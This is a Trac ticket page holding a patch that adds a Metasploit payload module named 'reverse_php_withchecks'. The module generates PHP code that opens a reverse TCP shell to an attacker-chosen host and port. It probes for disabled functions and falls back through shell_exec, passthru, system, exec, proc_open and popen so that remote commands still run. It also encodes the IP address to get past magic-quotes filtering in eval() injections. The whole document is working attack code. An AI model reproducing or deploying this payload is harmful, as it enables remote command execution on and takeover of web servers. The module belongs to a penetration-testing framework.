Ticket #197: reverse_php_withchecks.patch

File reverse_php_withchecks.patch, 3.7 kB (added by egypt@nmt.edu, 7 months ago)

modules/payloads/singles/php/reverse_php_withchecks.rb

old	new
	1	##
	2	# $Id: reverse_php.rb 4419 2007-02-18 00:10:39Z hdm $
	3	##
	4
	5	##
	6	# This file is part of the Metasploit Framework and may be subject to
	7	# redistribution and commercial restrictions. Please see the Metasploit
	8	# Framework web site for more information on licensing and terms of use.
	9	# http://metasploit.com/projects/Framework/
	10	##
	11
	12
	13	require 'msf/core'
	14	require 'msf/core/handler/reverse_tcp'
	15	require 'msf/base/sessions/command_shell'
	16
	17	module Msf
	18	module Payloads
	19	module Singles
	20	module Php
	21
	22	module ReversePhpWithChecks
	23
	24	include Msf::Payload::Single
	25
	26	def initialize(info = {})
	27	super(merge_info(info,
	28	'Name' => 'PHP Command Shell, Reverse TCP (via php)',
	29	'Version' => '$Revision: 4419 $',
	30	'Description' => 'Reverse PHP connect back shell with checks for disabled functions',
	31	'Author' => 'egypt <egypt@nmt.edu>',
	32	'License' => BSD_LICENSE,
	33	'Platform' => 'php',
	34	'Arch' => ARCH_PHP,
	35	'Handler' => Msf::Handler::ReverseTcp,
	36	'Session' => Msf::Sessions::CommandShell,
	37	'PayloadType' => 'cmd',
	38	'Payload' =>
	39	{
	40	'Offsets' => { },
	41	'Payload' => ''
	42	}
	43	))
	44	end
	45
	46	#
	47	# PHP Reverse Shell
	48	#
	49	def php_reverse_shell
	50
	51	#
	52	# inet_aton to bypass magic quotes protection for eval() vulnerarilities
	53	#
	54
	55	ipaddr = datastore['LHOST'].split(/\./).map{\|c\| c.to_i}.pack("C*").unpack("N").first
	56
	57	shell=<<-END_OF_PHP_CODE
	58	$disabled=@ini_get("disable_functions");
	59	if(!empty($disabled)){
	60	$disabled=preg_replace('/[,]+/',',',$disabled);
	61	$disabled=explode(',',$disabled);
	62	}else{$disabled=array();}
	63	function myexec($cmd){
	64	if(is_callable('shell_exec')and!in_array('shell_exec',$disabled)){
	65	returnshell_exec($cmd);
	66	}elseif(is_callable('passthru')and!in_array('passthru',$disabled)){
	67	ob_start();passthru($cmd);
	68	$output=ob_get_contents();
	69	ob_end_clean();
	70	return$output;
	71	}elseif(is_callable('system')and!in_array('system',$disabled)){
	72	ob_start();
	73	system($cmd);
	74	$output=ob_get_contents();
	75	ob_end_clean();
	76	return$output;
	77	}elseif(is_callable('exec')and!in_array('exec',$disabled)){
	78	$output=array();
	79	exec($cmd,$output);
	80	$output=join("",$output)."";
	81	return$output;
	82	}elseif(is_callable('proc_open')and!in_array('proc_open',$disabled)){
	83	$descriptors=array(array("pipe","r"),array("pipe","w"),array("pipe","w"),);
	84	$res=proc_open($cmd,$descriptors,$pipes);
	85	$output='';
	86	while(!feof($pipes[1])){$output.=fread($pipes[1],1024);}
	87	@proc_close($res);
	88	return$output;
	89	}elseif(is_callable('popen')and!in_array('popen',$disabled)){
	90	$fp=popen($cmd,"r");
	91	if(is_resource($fp)){
	92	$output='';
	93	while(!feof($fp)){
	94	$output.=fread($fp,1024);
	95	}@pclose($fp);
	96	}
	97	return$output;
	98	}else{return"All.exec.functions.are.disabled...Sorry.";}
	99	}
	100	$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
	101	$result=socket_connect($socket,#{ipaddr},#{datastore['LPORT']});
	102	$command=NULL;
	103	while($command=socket_read($socket,2048)){
	104	$output=myexec(substr($command,0,-1));
	105	socket_write($socket,$output,strlen($output));
	106	}
	107	socket_close($socket);
	108	END_OF_PHP_CODE
	109
	110	# spaces are important but remove tabs and newlines to save space
	111	shell.gsub!(/[\t\n]+/, '')
	112	return shell
	113	end
	114
	115	#
	116	# Constructs the payload
	117	#
	118	def generate
	119	return super + php_reverse_shell
	120	end
	121
	122
	123	end
	124
	125	end end end end

Download in other formats:

Original Format